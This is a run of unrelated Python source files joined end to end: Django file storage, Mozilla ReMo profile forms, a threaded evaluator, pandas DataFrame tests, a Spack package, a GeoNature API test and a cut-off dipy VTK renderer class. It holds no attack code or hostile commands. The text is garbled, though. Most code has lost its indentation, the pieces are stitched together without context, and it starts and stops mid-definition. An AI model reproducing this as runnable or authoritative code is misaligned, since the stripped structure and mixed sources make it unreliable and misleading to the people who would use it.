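#     store = InMemoryStorage()
#     saved_name = store.save('notes.txt', ContentFile(b'hello'))
#     store.exists(saved_name)  # True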
def _possibly_make_aware(dt):
"""
Convert a datetime object in the local timezone to aware
in UTC, if USE_TZ is True.
"""
# This function is only needed to help with the deprecations above and can
# be removed in Django 2.0, RemovedInDjango20Warning.
if settings.USE_TZ:
tz = timezone.get_default_timezone()
return timezone.make_aware(dt, tz).astimezone(timezone.utc)
else:
return dt
@deconstructible
class FileSystemStorage(Storage):
"""
Standard filesystem storage
"""
def __init__(self, location=None, base_url=None, file_permissions_mode=None,
directory_permissions_mode=None):
self._location = location
if base_url is not None and not base_url.endswith('/'):
base_url += '/'
self._base_url = base_url
self._file_permissions_mode = file_permissions_mode
self._directory_permissions_mode = directory_permissions_mode
setting_changed.connect(self._clear_cached_properties)
def _clear_cached_properties(self, setting, **kwargs):
"""Reset setting based property values."""
if setting == 'MEDIA_ROOT':
self.__dict__.pop('base_location', None)
self.__dict__.pop('location', None)
elif setting == 'MEDIA_URL':
self.__dict__.pop('base_url', None)
elif setting == 'FILE_UPLOAD_PERMISSIONS':
self.__dict__.pop('file_permissions_mode', None)
elif setting == 'FILE_UPLOAD_DIRECTORY_PERMISSIONS':
self.__dict__.pop('directory_permissions_mode', None)
def _value_or_setting(self, value, setting):
return setting if value is None else value
@cached_property
def base_location(self):
return self._value_or_setting(self._location, settings.MEDIA_ROOT)
@cached_property
def location(self):
return abspathu(self.base_location)
@cached_property
def base_url(self):
return self._value_or_setting(self._base_url, settings.MEDIA_URL)
@cached_property
def file_permissions_mode(self):
return self._value_or_setting(self._file_permissions_mode, settings.FILE_UPLOAD_PERMISSIONS)
@cached_property
def directory_permissions_mode(self):
return self._value_or_setting(self._directory_permissions_mode, settings.FILE_UPLOAD_DIRECTORY_PERMISSIONS)
def _open(self, name, mode='rb'):
return File(open(self.path(name), mode))
def _save(self, name, content):
full_path = self.path(name)
# Create any intermediate directories that do not exist.
# Note that there is a race between os.path.exists and os.makedirs:
# if os.makedirs fails with EEXIST, the directory was created
# concurrently, and we can continue normally. Refs #16082.
directory = os.path.dirname(full_path)
if not os.path.exists(directory):
try:
if self.directory_permissions_mode is not None:
# os.makedirs applies the global umask, so we reset it,
# for consistency with file_permissions_mode behavior.
old_umask = os.umask(0)
try:
os.makedirs(directory, self.directory_permissions_mode)
finally:
os.umask(old_umask)
else:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(directory):
raise IOError("%s exists and is not a directory." % directory)
# There's a potential race condition between get_available_name and
# saving the file; it's possible that two threads might return the
# same name, at which point all sorts of fun happens. So we need to
# try to create the file, but if it already exists we have to go back
# to get_available_name() and try again.
while True:
try:
# This file has a file path that we can move.
if hasattr(content, 'temporary_file_path'):
file_move_safe(content.temporary_file_path(), full_path)
# This is a normal uploadedfile that we can stream.
else:
# This fun binary flag incantation makes os.open throw an
# OSError if the file already exists before we open it.
flags = (os.O_WRONLY | os.O_CREAT | os.O_EXCL |
getattr(os, 'O_BINARY', 0))
# The current umask value is masked out by os.open!
fd = os.open(full_path, flags, 0o666)
_file = None
try:
locks.lock(fd, locks.LOCK_EX)
for chunk in content.chunks():
if _file is None:
mode = 'wb' if isinstance(chunk, bytes) else 'wt'
_file = os.fdopen(fd, mode)
_file.write(chunk)
finally:
locks.unlock(fd)
if _file is not None:
_file.close()
else:
os.close(fd)
except OSError as e:
if e.errno == errno.EEXIST:
# Ooops, the file exists. We need a new file name.
name = self.get_available_name(name)
full_path = self.path(name)
else:
raise
else:
# OK, the file save worked. Break out of the loop.
break
if self.file_permissions_mode is not None:
os.chmod(full_path, self.file_permissions_mode)
return name
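    # Illustrative sketch (not part of Django): the exclusive-create pattern
    # used in _save() above can be reproduced on its own. The file name
    # 'example.txt' is an arbitrary assumption for the demonstration.
    #
    #     import errno, os
    #     flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    #     try:
    #         fd = os.open('example.txt', flags, 0o666)
    #     except OSError as e:
    #         if e.errno == errno.EEXIST:
    #             pass  # name already taken; pick another and retry
    #         else:
    #             raise
    #     else:
    #         os.close(fd)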
def delete(self, name):
assert name, "The name argument is not allowed to be empty."
name = self.path(name)
# If the file exists, delete it from the filesystem.
# Note that there is a race between os.path.exists and os.remove:
# if os.remove fails with ENOENT, the file was removed
# concurrently, and we can continue normally.
if os.path.exists(name):
try:
os.remove(name)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def exists(self, name):
return os.path.exists(self.path(name))
def listdir(self, path):
path = self.path(path)
directories, files = [], []
for entry in os.listdir(path):
if os.path.isdir(os.path.join(path, entry)):
directories.append(entry)
else:
files.append(entry)
return directories, files
def path(self, name):
return safe_join(self.location, name)
def size(self, name):
return os.path.getsize(self.path(name))
def url(self, name):
if self.base_url is None:
raise ValueError("This file is not accessible via a URL.")
url = filepath_to_uri(name)
if url is not None:
url = url.lstrip('/')
return urljoin(self.base_url, url)
def accessed_time(self, name):
warnings.warn(
'FileSystemStorage.accessed_time() is deprecated in favor of '
'get_accessed_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getatime(self.path(name)))
def created_time(self, name):
warnings.warn(
'FileSystemStorage.created_time() is deprecated in favor of '
'get_created_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getctime(self.path(name)))
def modified_time(self, name):
warnings.warn(
'FileSystemStorage.modified_time() is deprecated in favor of '
'get_modified_time().',
RemovedInDjango20Warning,
stacklevel=2,
)
return datetime.fromtimestamp(os.path.getmtime(self.path(name)))
def _datetime_from_timestamp(self, ts):
"""
If timezone support is enabled, make an aware datetime object in UTC;
otherwise make a naive one in the local timezone.
"""
if settings.USE_TZ:
# Safe to use .replace() because UTC doesn't have DST
return datetime.utcfromtimestamp(ts).replace(tzinfo=timezone.utc)
else:
return datetime.fromtimestamp(ts)
def get_accessed_time(self, name):
return self._datetime_from_timestamp(os.path.getatime(self.path(name)))
def get_created_time(self, name):
return self._datetime_from_timestamp(os.path.getctime(self.path(name)))
def get_modified_time(self, name):
return self._datetime_from_timestamp(os.path.getmtime(self.path(name)))
def get_storage_class(import_path=None):
return import_string(import_path or settings.DEFAULT_FILE_STORAGE)
class DefaultStorage(LazyObject):
def _setup(self):
self._wrapped = get_storage_class()()
default_storage = DefaultStorage()
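# Illustrative usage sketch (not part of Django): with DEFAULT_FILE_STORAGE and
# MEDIA_ROOT configured in settings, the lazy default_storage object behaves
# like any Storage instance. The file name below is an assumption.
#
#     from django.core.files.base import ContentFile
#     from django.core.files.storage import default_storage
#     name = default_storage.save('notes/example.txt', ContentFile(b'hello'))
#     assert default_storage.exists(name)
#     default_storage.delete(name)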
|
import happyforms
import re
from datetime import timedelta
from django import forms
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.forms.extras.widgets import SelectDateWidget
from django.utils.safestring import mark_safe
from django.utils.timezone import now
from mozilla_django_oidc.auth import default_username_algo
from product_details import product_details
from pytz import common_timezones
from remo.base.templatetags.helpers import user_is_rep
from remo.base.utils import get_date
from remo.profiles.models import (FunctionalArea, MobilisingInterest, MobilisingSkill,
UserProfile, UserStatus)
USERNAME_ALGO = getattr(settings, 'OIDC_USERNAME_ALGO', default_username_algo)
BOOLEAN_CHOICES = ((True, 'Yes'), (False, 'No'))
# Max period that a user can be unavailable in weeks
MAX_UNAVAILABILITY_PERIOD = 12
# SOP url for leaving the program
LEAVING_SOP_URL = ('<a href="https://wiki.mozilla.org/ReMo/SOPs/Leaving" '
'target="_blank">Leaving SOP</a>')
class InviteUserForm(happyforms.Form):
"""Form to invite a new user."""
def _validate_unique_email(data, **kwargs):
# Django does not require unique emails but we do.
if User.objects.filter(email=data).exists():
user = User.objects.filter(email=data)
if user and user[0].groups.filter(name='Mozillians').exists():
user[0].delete()
else:
raise ValidationError('User already exists.')
return data
email = forms.EmailField(label='Email',
validators=[_validate_unique_email])
class ChangeUserForm(happyforms.ModelForm):
"""Form to change user details."""
email = forms.EmailField()
class Meta:
model = User
fields = ('first_name', 'last_name', 'email')
def _clean_names(self, data):
"""Ensure that data is valid.
        Variable data can contain only Latin letters (both capital and
        lower case), spaces and the apostrophe character (').
"""
if not re.match(r'(^[A-Za-z\' ]+$)', data):
raise ValidationError('Please use only Latin characters.')
return data
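    # For example, given the regex above, "Anne Marie" and "O'Connor" are
    # accepted, while "José" or "Anne-Marie" raise ValidationError (non-Latin
    # characters and hyphens are not allowed).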
def clean_first_name(self):
"""Ensure that first_name is valid."""
data = self.cleaned_data['first_name']
return self._clean_names(data)
def clean_last_name(self):
"""Ensure that last_name is valid."""
data = self.cleaned_data['last_name']
return self._clean_names(data)
def clean_email(self):
email = self.cleaned_data['email']
if (User.objects.filter(email=email)
.exclude(email=self.instance.email)
.exists()):
msg = ("Email already exists. You probably used this email to "
"sign in as a 'mozillian' into the portal. "
"Please send an email to "
"https://lists.mozilla.org/listinfo/reps-webdev "
"to get help.")
raise ValidationError(msg)
return email
def save(self):
"""Override save method to update user's
username hash on the database.
"""
self.instance.username = USERNAME_ALGO(self.instance.email)
super(ChangeUserForm, self).save()
class ChangeProfileForm(happyforms.ModelForm):
"""Form to change userprofile details."""
gender = forms.ChoiceField(required=False, choices=((None, "Gender"),
(True, "Female"),
(False, "Male")))
mentor = forms.ModelChoiceField(
queryset=(User.objects.filter(userprofile__registration_complete=True,
groups__name='Mentor')
.order_by('first_name')),
required=False,
empty_label=u'Please choose a mentor')
country = forms.ChoiceField(
choices=[],
error_messages={'required': 'Please select one option from the list.'})
timezone = forms.ChoiceField(choices=[], required=False)
def __init__(self, *args, **kwargs):
"""Initialize form.
Dynamically set choices for country fields.
"""
self.request = kwargs.pop('request', None)
super(ChangeProfileForm, self).__init__(*args, **kwargs)
countries = product_details.get_regions('en').values()
countries.sort()
country_choices = ([('', "Country")] +
[(country, country) for country in countries])
self.fields['country'].choices = country_choices
timezone_choices = ([('', 'Timezone')] +
zip(common_timezones, common_timezones))
self.fields['timezone'].choices = timezone_choices
def clean_twitter_account(self):
"""Make sure that twitter_account does not start with a '@'."""
twitter_account = self.cleaned_data['twitter_account']
return twitter_account.strip('@')
def clean_mentor(self):
"""Make sure that we don't save an empty mentor if it was not part of the request"""
if not self.request.user.has_perm('profiles.can_change_mentor'):
self.cleaned_data['mentor'] = self.instance.mentor
return self.cleaned_data['mentor']
class Meta:
model = UserProfile
fields = ('local_name', 'birth_date',
'city', 'region', 'country',
'lon', 'lat', 'display_name',
'private_email', 'mozillians_profile_url',
'twitter_account', 'jabber_id', 'irc_name',
'irc_channels', 'facebook_url', 'linkedin_url',
'diaspora_url', 'personal_website_url', 'personal_blog_feed',
'bio', 'gender', 'mentor', 'wiki_profile_url',
'functional_areas', 'mobilising_skills', 'mobilising_interests',
'timezone')
class ChangeDatesForm(happyforms.ModelForm):
"""Form to change the dates that user joined and left the program."""
class Meta:
model = UserProfile
fields = ['date_joined_program', 'date_left_program']
widgets = {'date_joined_program':
SelectDateWidget(years=range(2011, now().date().year + 1)),
'date_left_program':
SelectDateWidget(years=range(2011, now().date().year + 1))}
def __init__(self, *args, **kwargs):
super(ChangeDatesForm, self).__init__(*args, **kwargs)
# Set the year portion of the date_left_program field same as the
# date_joined_program field
if self.instance and 'date_left_program' in self.fields:
form_widget = SelectDateWidget(years=range(
self.instance.date_joined_program.year, now().date().year + 1))
self.fields['date_left_program'].widget = form_widget
def save(self, commit=True):
"""Override save method for custom functinality."""
# If a user belongs to the Alumni group and no date is suplied for
# leaving the program, the date is auto-populated.
# If a user is not member of the Alumni group the date_left_program
# must be None
if self.instance.user.groups.filter(name='Alumni').exists():
if 'date_left_program' not in self.changed_data:
self.instance.date_left_program = now().date()
else:
self.instance.date_left_program = None
super(ChangeDatesForm, self).save()
class FunctionalAreaForm(happyforms.ModelForm):
"""Form of functional areas."""
class Meta:
model = FunctionalArea
fields = ['name', 'active']
class MobilisingSkillForm(happyforms.ModelForm):
"""Form of mobilising skill."""
class Meta:
model = MobilisingSkill
fields = ['name', 'active']
class MobilisingInterestForm(happyforms.ModelForm):
"""Form of mobilising interest."""
class Meta:
model = MobilisingInterest
fields = ['name', 'active']
class UserStatusForm(happyforms.ModelForm):
"""Form for displaying info regarding the availability status of a user."""
start_date = forms.DateField(input_formats=['%d %B %Y'])
expected_date = forms.DateField(input_formats=['%d %B %Y'])
is_replaced = forms.BooleanField(widget=forms.RadioSelect(
choices=BOOLEAN_CHOICES, attrs={'id': 'id_is_replaced'}),
required=False)
def __init__(self, *args, **kwargs):
super(UserStatusForm, self).__init__(*args, **kwargs)
query = (User.objects.filter(
groups__name='Rep', userprofile__registration_complete=True)
.exclude(id=self.instance.user.id).order_by('first_name'))
self.fields['replacement_rep'].queryset = query
if self.instance.id:
self.fields['expected_date'].widget = forms.HiddenInput()
self.fields['start_date'].widget = forms.HiddenInput()
self.fields['start_date'].required = False
def clean(self):
"""Clean Form."""
cdata = super(UserStatusForm, self).clean()
if self.instance.id:
cdata['start_date'] = self.instance.start_date
return cdata
tomorrow = get_date(days=1)
today = get_date()
if 'start_date' in cdata:
if cdata['start_date'] < today:
msg = u'Start date cannot be in the past.'
self._errors['start_date'] = self.error_class([msg])
if 'expected_date' in cdata:
start_date = cdata['start_date']
expected_date = cdata['expected_date']
max_period = start_date + timedelta(weeks=MAX_UNAVAILABILITY_PERIOD)
if expected_date < tomorrow:
msg = (u'Return day cannot be earlier than {0}'
.format(tomorrow.strftime('%d %B %Y')))
self._errors['expected_date'] = self.error_class([msg])
if expected_date < start_date:
msg = u'Return date cannot be before start date.'
self._errors['expected_date'] = self.error_class([msg])
if expected_date > max_period:
msg = (u'The maximum period for unavailability is until {0}.'
.format(max_period.strftime('%d %B %Y')))
sop = mark_safe(msg + (' For more information please check '
'the %s') % LEAVING_SOP_URL)
self._errors['expected_date'] = self.error_class([sop])
if ('is_replaced' in cdata and
cdata['is_replaced'] and not cdata['replacement_rep']):
msg = 'Please select a replacement Rep during your absence.'
self._errors['replacement_rep'] = self.error_class([msg])
return cdata
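    # Worked example of the rules above (assuming today is 2018-01-01 and
    # MAX_UNAVAILABILITY_PERIOD = 12): start_date must not be in the past,
    # and expected_date must be no earlier than 2018-01-02, no earlier than
    # start_date, and no later than start_date + timedelta(weeks=12),
    # i.e. 2018-03-26; otherwise the corresponding field errors are set.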
class Meta:
model = UserStatus
fields = ['start_date', 'expected_date', 'replacement_rep']
class RotmNomineeForm(happyforms.Form):
"""Form for nominating the Rep of the month."""
is_rotm_nominee = forms.BooleanField(widget=forms.RadioSelect(
choices=BOOLEAN_CHOICES, attrs={'id': 'id_is_rotm_nominee'}),
required=False)
def __init__(self, *args, **kwargs):
""" Initialize the form
Dynamically set the default value to true if the user is not already
nominated.
"""
self.instance = kwargs.pop('instance', None)
super(RotmNomineeForm, self).__init__(*args, **kwargs)
self.fields['is_rotm_nominee'].widget = forms.HiddenInput()
if self.instance and not self.instance.is_rotm_nominee:
self.fields['is_rotm_nominee'].initial = True
def clean(self):
"""Clean Form."""
cdata = super(RotmNomineeForm, self).clean()
user = self.instance.user
if not user_is_rep(user):
raise ValidationError('You cannot nominate a non Rep user.')
return cdata
def save(self, nominated_by, *args, **kwargs):
if (self.instance and not self.instance.is_rotm_nominee and
nominated_by != self.instance.user and
self.cleaned_data['is_rotm_nominee']):
self.instance.is_rotm_nominee = True
self.instance.rotm_nominated_by = nominated_by
self.instance.save()
|
import os
import time
import numpy as np
from threading import Thread
class ObjectiveFunction:
def __init__(self):
self.population = None
def initialize(self, population):
self.population = population
def ids_sorted(self, selection):
values = np.array([self.population.value(i) for i in selection])
argsort = np.argsort(values)
return np.array(selection)[argsort]
def get_values(self, selection):
ret = {}
for i in selection:
ret[i] = self.population.value(i)
return ret
class Evaluator:
def __init__(self):
self.process = None
self.thread = None
self.population = None
@property
def is_running(self):
if self.thread is not None:
return self.thread.is_alive()
else:
return False
def initialize(self, population):
self.population = population
def evaluate(self, i):
x = self.population.coordinate(i)
y = self.population.function(x)
if y is not None:
self.population.set_value(i, y)
self.population.evaluated.append(i)
def run(self):
def worker(evaluator, population):
while True:
for i in population.actives:
if not population.is_evaluated(i):
evaluator.evaluate(i)
time.sleep(1)
if os.path.exists('stop'):
os.remove('stop')
return
# self.process = Process(target=worker, args=(self.population,))
# self.process.start()
self.thread = Thread(target=worker, args=(self, self.population,))
self.thread.daemon = True
self.thread.start()
def stop(self):
        if self.process is not None and self.process.is_alive():
self.process.terminate()
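# Illustrative wiring sketch (assumptions, not from the original source): the
# `population` object passed to Evaluator.initialize() is expected to expose
# coordinate(i), function(x), value(i), set_value(i, y), is_evaluated(i), and
# the lists `actives` and `evaluated` -- exactly the attributes used above.
#
#     evaluator = Evaluator()
#     evaluator.initialize(population)   # `population` is a hypothetical object
#     evaluator.run()                    # starts the background worker thread
#     ...
#     open('stop', 'w').close()          # creating a 'stop' file ends the worker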
|
from copy import deepcopy
from distutils.version import LooseVersion
from operator import methodcaller
import numpy as np
import pytest
import pandas.util._test_decorators as td
import pandas as pd
from pandas import DataFrame, MultiIndex, Series, date_range
import pandas.util.testing as tm
from pandas.util.testing import (
assert_almost_equal, assert_frame_equal, assert_series_equal)
from .test_generic import Generic
try:
import xarray
_XARRAY_INSTALLED = True
except ImportError:
_XARRAY_INSTALLED = False
class TestDataFrame(Generic):
_typ = DataFrame
_comparator = lambda self, x, y: assert_frame_equal(x, y)
def test_rename_mi(self):
df = DataFrame([
11, 21, 31
], index=MultiIndex.from_tuples([("A", x) for x in ["a", "B", "c"]]))
df.rename(str.lower)
def test_set_axis_name(self):
df = pd.DataFrame([[1, 2], [3, 4]])
funcs = ['_set_axis_name', 'rename_axis']
for func in funcs:
result = methodcaller(func, 'foo')(df)
assert df.index.name is None
assert result.index.name == 'foo'
result = methodcaller(func, 'cols', axis=1)(df)
assert df.columns.name is None
assert result.columns.name == 'cols'
def test_set_axis_name_mi(self):
df = DataFrame(
np.empty((3, 3)),
index=MultiIndex.from_tuples([("A", x) for x in list('aBc')]),
columns=MultiIndex.from_tuples([('C', x) for x in list('xyz')])
)
level_names = ['L1', 'L2']
funcs = ['_set_axis_name', 'rename_axis']
for func in funcs:
result = methodcaller(func, level_names)(df)
assert result.index.names == level_names
assert result.columns.names == [None, None]
result = methodcaller(func, level_names, axis=1)(df)
assert result.columns.names == ["L1", "L2"]
assert result.index.names == [None, None]
def test_nonzero_single_element(self):
# allow single item via bool method
df = DataFrame([[True]])
assert df.bool()
df = DataFrame([[False]])
assert not df.bool()
df = DataFrame([[False, False]])
with pytest.raises(ValueError):
df.bool()
with pytest.raises(ValueError):
bool(df)
def test_get_numeric_data_preserve_dtype(self):
# get the numeric data
o = DataFrame({'A': [1, '2', 3.]})
result = o._get_numeric_data()
expected = DataFrame(index=[0, 1, 2], dtype=object)
self._compare(result, expected)
def test_metadata_propagation_indiv(self):
# groupby
df = DataFrame(
{'A': ['foo', 'bar', 'foo', 'bar', 'foo', 'bar', 'foo', 'foo'],
'B': ['one', 'one', 'two', 'three', 'two', 'two', 'one', 'three'],
'C': np.random.randn(8),
'D': np.random.randn(8)})
result = df.groupby('A').sum()
self.check_metadata(df, result)
# resample
df = DataFrame(np.random.randn(1000, 2),
index=date_range('20130101', periods=1000, freq='s'))
result = df.resample('1T')
self.check_metadata(df, result)
# merging with override
# GH 6923
_metadata = DataFrame._metadata
_finalize = DataFrame.__finalize__
np.random.seed(10)
df1 = DataFrame(np.random.randint(0, 4, (3, 2)), columns=['a', 'b'])
df2 = DataFrame(np.random.randint(0, 4, (3, 2)), columns=['c', 'd'])
DataFrame._metadata = ['filename']
df1.filename = 'fname1.csv'
df2.filename = 'fname2.csv'
def finalize(self, other, method=None, **kwargs):
for name in self._metadata:
if method == 'merge':
left, right = other.left, other.right
value = getattr(left, name, '') + '|' + getattr(right,
name, '')
object.__setattr__(self, name, value)
else:
object.__setattr__(self, name, getattr(other, name, ''))
return self
DataFrame.__finalize__ = finalize
result = df1.merge(df2, left_on=['a'], right_on=['c'], how='inner')
assert result.filename == 'fname1.csv|fname2.csv'
# concat
# GH 6927
DataFrame._metadata = ['filename']
df1 = DataFrame(np.random.randint(0, 4, (3, 2)), columns=list('ab'))
df1.filename = 'foo'
def finalize(self, other, method=None, **kwargs):
for name in self._metadata:
if method == 'concat':
value = '+'.join([getattr(
o, name) for o in other.objs if getattr(o, name, None)
])
object.__setattr__(self, name, value)
else:
object.__setattr__(self, name, getattr(other, name, None))
return self
DataFrame.__finalize__ = finalize
result = pd.concat([df1, df1])
assert result.filename == 'foo+foo'
# reset
DataFrame._metadata = _metadata
DataFrame.__finalize__ = _finalize
def test_set_attribute(self):
# Test for consistent setattr behavior when an attribute and a column
# have the same name (Issue #8994)
df = DataFrame({'x': [1, 2, 3]})
df.y = 2
df['y'] = [2, 4, 6]
df.y = 5
assert df.y == 5
assert_series_equal(df['y'], Series([2, 4, 6], name='y'))
@pytest.mark.skipif(not _XARRAY_INSTALLED or _XARRAY_INSTALLED and
LooseVersion(xarray.__version__) <
LooseVersion('0.10.0'),
reason='xarray >= 0.10.0 required')
@pytest.mark.parametrize(
"index", ['FloatIndex', 'IntIndex',
'StringIndex', 'UnicodeIndex',
'DateIndex', 'PeriodIndex',
'CategoricalIndex', 'TimedeltaIndex'])
def test_to_xarray_index_types(self, index):
from xarray import Dataset
index = getattr(tm, 'make{}'.format(index))
df = DataFrame({'a': list('abc'),
'b': list(range(1, 4)),
'c': np.arange(3, 6).astype('u1'),
'd': np.arange(4.0, 7.0, dtype='float64'),
'e': [True, False, True],
'f': pd.Categorical(list('abc')),
'g': pd.date_range('20130101', periods=3),
'h': pd.date_range('20130101',
periods=3,
tz='US/Eastern')}
)
df.index = index(3)
df.index.name = 'foo'
df.columns.name = 'bar'
result = df.to_xarray()
assert result.dims['foo'] == 3
assert len(result.coords) == 1
assert len(result.data_vars) == 8
assert_almost_equal(list(result.coords.keys()), ['foo'])
assert isinstance(result, Dataset)
# idempotency
# categoricals are not preserved
# datetimes w/tz are not preserved
# column names are lost
expected = df.copy()
expected['f'] = expected['f'].astype(object)
expected['h'] = expected['h'].astype('datetime64[ns]')
expected.columns.name = None
assert_frame_equal(result.to_dataframe(), expected,
check_index_type=False, check_categorical=False)
@td.skip_if_no('xarray', min_version='0.7.0')
def test_to_xarray(self):
from xarray import Dataset
df = DataFrame({'a': list('abc'),
'b': list(range(1, 4)),
'c': np.arange(3, 6).astype('u1'),
'd': np.arange(4.0, 7.0, dtype='float64'),
'e': [True, False, True],
'f': pd.Categorical(list('abc')),
'g': pd.date_range('20130101', periods=3),
'h': pd.date_range('20130101',
periods=3,
tz='US/Eastern')}
)
df.index.name = 'foo'
result = df[0:0].to_xarray()
assert result.dims['foo'] == 0
assert isinstance(result, Dataset)
# available in 0.7.1
# MultiIndex
df.index = pd.MultiIndex.from_product([['a'], range(3)],
names=['one', 'two'])
result = df.to_xarray()
assert result.dims['one'] == 1
assert result.dims['two'] == 3
assert len(result.coords) == 2
assert len(result.data_vars) == 8
assert_almost_equal(list(result.coords.keys()), ['one', 'two'])
assert isinstance(result, Dataset)
result = result.to_dataframe()
expected = df.copy()
expected['f'] = expected['f'].astype(object)
expected['h'] = expected['h'].astype('datetime64[ns]')
expected.columns.name = None
assert_frame_equal(result,
expected,
check_index_type=False)
def test_deepcopy_empty(self):
# This test covers empty frame copying with non-empty column sets
# as reported in issue GH15370
empty_frame = DataFrame(data=[], index=[], columns=['A'])
empty_frame_copy = deepcopy(empty_frame)
self._compare(empty_frame_copy, empty_frame)
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class BookleafCpp(CMakePackage):
"""BookLeaf is a 2D unstructured hydrodynamics mini-app."""
homepage = "https://github.com/UK-MAC/BookLeaf_Cpp"
url = "https://github.com/UK-MAC/BookLeaf_Cpp/archive/v2.0.tar.gz"
git = "https://github.com/UK-MAC/BookLeaf_Cpp.git"
version('develop', branch='develop')
version('2.0.2', sha256='787ade5045415d71d9bad55fe9f93598f3a0548d13e2ff80e752cc99f62fe6d3')
version('2.0.1', sha256='1286f916f59d1f3bf325041854e8c203894e293c5e26d5b19b9362ee02082983')
version('2.0', sha256='3c14344c31385bec9e089f9babf815566c4fcf98a47822f663afa2cefb0e90e1')
variant('typhon', default=True, description='Use Typhon')
variant('parmetis', default=False, description='Use ParMETIS')
variant('silo', default=False, description='Use Silo')
variant('caliper', default=False, description='Use Caliper')
depends_on('caliper', when='+caliper')
depends_on('parmetis', when='+parmetis')
depends_on('silo', when='+silo')
depends_on('typhon', when='+typhon')
depends_on('mpi', when='+typhon')
depends_on('[email protected]:')
def cmake_args(self):
spec = self.spec
cmake_args = []
if '+typhon' in spec:
cmake_args.append('-DENABLE_TYPHON=ON')
if '+parmetis' in spec:
cmake_args.append('-DENABLE_PARMETIS=ON')
if '+silo' in spec:
cmake_args.append('-DENABLE_SILO=ON')
if '+caliper' in spec:
cmake_args.append('-DENABLE_CALIPER=ON')
return cmake_args
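    # Illustrative usage (not part of the package recipe): enabling variants
    # on the command line maps directly to the CMake flags above, e.g.
    #
    #     spack install bookleaf-cpp +typhon +caliper
    #
    # configures the build with -DENABLE_TYPHON=ON and -DENABLE_CALIPER=ON.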
|
# '''
# Test of the gn_media API
# '''
import pytest
from flask import url_for
from .bootstrap_test import app
from geonature.core.gn_monitoring.models import TBaseSites
from geonature.core.gn_monitoring.config_manager import generate_config
from pypnnomenclature.models import TNomenclatures
from geonature.utils.env import DB
@pytest.mark.usefixtures('client_class')
class TestAPICore:
    # TODO: review this test; it is not clear what it does
# def test_gn_core_route_config(self):
# response = self.client.get(
# url_for('core.get_config')
# )
# query_string= {
# 'app':'test',
# 'vue':'test'
# }
# # response = requests.get(
# # '{}/config?app=test&vue=test'.format(
# # geonature_app.config['API_ENDPOINT']
# # )
# # )
# assert response.status_code == 200
def test_gn_core_generic_view(self):
query_string = {
'cd_nom':60612,
'ilike_lb_nom':'Ly'
}
response = self.client.get(
url_for(
'core.get_generic_view',
view_schema='gn_synthese',
view_name='v_synthese_for_web_app'
),
query_string=query_string
)
assert response.status_code == 200
|
from __future__ import division, print_function, absolute_import
import gzip
from warnings import warn
import numpy as np
from scipy import ndimage
from copy import copy
from nibabel.tmpdirs import InTemporaryDirectory
from nibabel.py3k import asbytes
try:
import Tkinter as tkinter
has_tkinter = True
except ImportError:
try:
import tkinter
has_tkinter = True
except ImportError:
has_tkinter = False
try:
import tkFileDialog as filedialog
except ImportError:
try:
from tkinter import filedialog
except ImportError:
has_tkinter = False
# Conditional import machinery for vtk
from dipy.utils.optpkg import optional_package
from dipy import __version__ as dipy_version
from dipy.utils.six import string_types
from dipy.viz.interactor import CustomInteractorStyle
# Allow import, but disable doctests if we don't have vtk
vtk, have_vtk, setup_module = optional_package('vtk')
colors, have_vtk_colors, _ = optional_package('vtk.util.colors')
numpy_support, have_ns, _ = optional_package('vtk.util.numpy_support')
_, have_imread, _ = optional_package('Image')
if not have_imread:
_, have_imread, _ = optional_package('PIL')
if have_vtk:
version = vtk.vtkVersion.GetVTKSourceVersion().split(' ')[-1]
major_version = vtk.vtkVersion.GetVTKMajorVersion()
from vtk.util.numpy_support import vtk_to_numpy
vtkRenderer = vtk.vtkRenderer
else:
vtkRenderer = object
if have_imread:
from scipy.misc import imread
class Renderer(vtkRenderer):
""" Your scene class
This is an important object that is responsible for preparing objects
e.g. actors and volumes for rendering. This is a more pythonic version
    of ``vtkRenderer`` providing simple methods for adding and removing actors
but also it provides access to all the functionality
available in ``vtkRenderer`` if necessary.
"""
def background(self, color):
""" Set a background color
"""
self.SetBackground(color)
def add(self, *actors):
""" Add an actor to the renderer
"""
for actor in actors:
if isinstance(actor, vtk.vtkVolume):
self.AddVolume(actor)
elif isinstance(actor, vtk.vtkActor2D):
self.AddActor2D(actor)
elif hasattr(actor, 'add_to_renderer'):
actor.add_to_renderer(self)
else:
self.AddActor(actor)
def rm(self, actor):
""" Remove a specific actor
"""
self.RemoveActor(actor)
def clear(self):
""" Remove all actors from the renderer
"""
self.RemoveAllViewProps()
def rm_all(self):
""" Remove all actors from the renderer
"""
self.RemoveAllViewProps()
def projection(self, proj_type='perspective'):
""" Deside between parallel or perspective projection
Parameters
----------
proj_type : str
Can be 'parallel' or 'perspective' (default).
"""
if proj_type == 'parallel':
self.GetActiveCamera().ParallelProjectionOn()
else:
self.GetActiveCamera().ParallelProjectionOff()
def reset_camera(self):
""" Reset the camera to an automatic position given by the engine.
"""
self.ResetCamera()
def reset_clipping_range(self):
self.ResetCameraClippingRange()
def camera(self):
return self.GetActiveCamera()
def get_camera(self):
cam = self.GetActiveCamera()
return cam.GetPosition(), cam.GetFocalPoint(), cam.GetViewUp()
def camera_info(self):
cam = self.camera()
print('# Active Camera')
print(' Position (%.2f, %.2f, %.2f)' % cam.GetPosition())
print(' Focal Point (%.2f, %.2f, %.2f)' % cam.GetFocalPoint())
print(' View Up (%.2f, %.2f, %.2f)' % cam.GetViewUp())
def set_camera(self, position=None, focal_point=None, view_up=None):
if position is not None:
self.GetActiveCamera().SetPosition(*position)
if focal_point is not None:
self.GetActiveCamera().SetFocalPoint(*focal_point)
if view_up is not None:
self.GetActiveCamera().SetViewUp(*view_up)
self.ResetCameraClippingRange()
def size(self):
""" Renderer size"""
return self.GetSize()
def zoom(self, value):
""" In perspective mode, decrease the view angle by the specified
factor. In parallel mode, decrease the parallel scale by the specified
factor. A value greater than 1 is a zoom-in, a value less than 1 is a
zoom-out.
"""
self.GetActiveCamera().Zoom(value)
def azimuth(self, angle):
